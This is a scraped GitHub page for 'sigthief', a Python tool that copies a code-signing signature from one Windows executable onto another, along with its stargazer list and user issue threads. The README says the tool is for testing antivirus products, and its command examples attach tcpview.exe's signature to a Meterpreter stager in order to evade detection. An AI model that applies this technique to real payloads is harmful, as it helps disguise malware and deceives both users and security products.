secretsquirrel / sigthief Goto Github PK

View Code? Open in Web Editor NEW

2.0K 58.0 462.0 33 KB

Stealing Signatures and Making One Invalid Signature at a Time

License: BSD 3-Clause "New" or "Revised" License

Python 100.00%

pe python testing-antivirus certificates python3

sigthief's Introduction

SigThief

New version available to Dev-tier sponsors: https://github.com/sponsors/secretsquirrel

Stable tier will have it End of Month August 2021

Stealing Signatures and Making One Invalid Signature at a Time (Unless you read this: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf)

https://twitter.com/subTee/status/912769644473098240

For security professionals only...

What is this?

I've noticed during testing against Anti-Virus over the years that each is different and each prioritize PE signatures differently, whether the signature is valid or not. There are some Anti-Virus vendors that give priority to certain certificate authorities without checking that the signature is actually valid, and there are those that just check to see that the certTable is populated with some value. It's a mess.

So I'm releasing this tool to let you quickly do your testing and feel free to report it to vendors or not.

In short it will rip a signature off a signed PE file and append it to another one, fixing up the certificate table to sign the file.

Of course it's not a valid signature and that's the point!

I look forward to hearing about your results!

How to use

Usage

Usage: sigthief.py [options]

Options:
  -h, --help            show this help message and exit
  -i FILE, --file=FILE  input file
  -r, --rip             rip signature off inputfile
  -a, --add             add signautre to targetfile
  -o OUTPUTFILE, --output=OUTPUTFILE
                        output file
  -s SIGFILE, --sig=SIGFILE
                        binary signature from disk
  -t TARGETFILE, --target=TARGETFILE
                        file to append signature too
  -c, --checksig        file to check if signed; does not verify signature
  -T, --truncate        truncate signature (i.e. remove sig)

Take a Signature from a binary and add it to another binary

$ ./sigthief.py -i tcpview.exe -t x86_meterpreter_stager.exe -o /tmp/msftesting_tcpview.exe 
Output file: /tmp/msftesting_tcpview.exe
Signature appended. 
FIN.

Save Signature to disk for use later

$ ./sigthief.py -i tcpview.exe -r                                                        
Ripping signature to file!
Output file: tcpview.exe_sig
Signature ripped. 
FIN.

Use the ripped signature

$ ./sigthief.py -s tcpview.exe_sig -t x86_meterpreter_stager.exe                               
Output file: x86_meterpreter_stager.exe_signed
Signature appended. 
FIN.

Truncate (remove) signature

This has really interesting results actually, can help you find AVs that value Signatures over functionality of code. Unsign putty.exe ;)

$ ./sigthief.py -i tcpview.exe -T    
Inputfile is signed!
Output file: tcpview.exe_nosig
Overwriting certificate table pointer and truncating binary
Signature removed. 
FIN.

Check if there is a signature (does not check validity)

$ ./sigthief.py -i tcpview.exe -c
Inputfile is signed!

sigthief's People

Contributors

Stargazers

Watchers

Forkers

evilrovot ydc1992 johnjohnsp1 kazimer 00derp joshpitts-okta shantanu561993 minkione suriya73 blindfuzzy detrojones olivierh59500 firefalc0n cephurs m00zh33 hyabcd tuian secretnonempty losiry xxxdebug theralfbrown misterfitzy zhuhuibeishadiao 4n6strider akpotter ashr wisdark ohio813 y11en cs24 voraka clicknull b1gw00d tobey123 grukz homjxi0e ioudkerk initpwn zavierxu h1d3r iamvasanth07 samyoyo snollyg0st3r ayooshagarwal melkorazo liggle123 wanlie phpplay cyri1s leftspace89 474172261 borjamerino moriarty2016 binlmmhc blacktrace empyrials nan3r rkornmeyer lidd1224856175 beyondcy quikilr koushui tmmmmmr filipesam demonsec666 samueltt xxmmy rcommon hackmycontrolsystem huangfengye h3len tristindavis bwry r3dfruitrollup mehrdad-shokri shellgh05t poppopjmp x90x90x90 seatrix own2pwn tai-euler ykankaya w00t3k asuralove rakesh72 gavz qsdj redwifiteam weekez78 gitlabsyncint superuser5 csky6688 r0cknrolla disk-kk nou4r asd470613472 1sn0m4d analyticsearch khattab mkv4

sigthief's Issues

Working or not?

Is this script still working if not where i can buy new code?

Would this work for a DLL file aswell?

struct.error: unpack

Traceback (most recent call last):
File "./sigthief.py", line 246, in
cert = copyCert(options.inputfile)
File "./sigthief.py", line 106, in copyCert
flItms = gather_file_info_win(exe)
File "./sigthief.py", line 23, in gather_file_info_win
flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
struct.error: unpack

requires a bytes object of length 4

Minor typo

Hi,
Unless I'm completely stupid & misunderstanding the -h options, it should display: "file to steal signature from", and not "file still signature from", right ?
Thx for your tool, very much !

sigthief.py: error: You must do something!

I don't know if I'm doing something wrong, but trying to use this command: "sigthief.py -i real.dll -t test.dll -o clone.dll" doesn't work.

Python (specifically 3.9.6) installed and SigThief.py is in the Tools folder with the two dlls inside the folder.

Not bypassing Smart Screen

Even though it does a great job but Windows Smart Screen and UAC still tell that app is coming from unknown publisher so AV already that the sign is fake?

Input file not signed

Hey,

Thanks for this awesome tool.
But I'm having trouble using it, as no matter what I do, it always throws this message: "Input file not signed!"
I've tried with cmd.exe, tasklist.exe, systray.exe, but no luck.

What am I doing wrong?

Pls help and thanks!

No works

The sign tool not works properly:

Any alternative of SigThief for Linux binaries

Hey @secretsquirrel. I have used SigThief on numerous occasions and it worked like a charm. However, I have moved away from the windows environment to the Linux env and was scouring through the internet to find an alternative for Linux bins that works as smoothly as SigThief. Do you have any tool in mind are or are you planning to include this feature in the new release?

Its not creating file

no error log or something..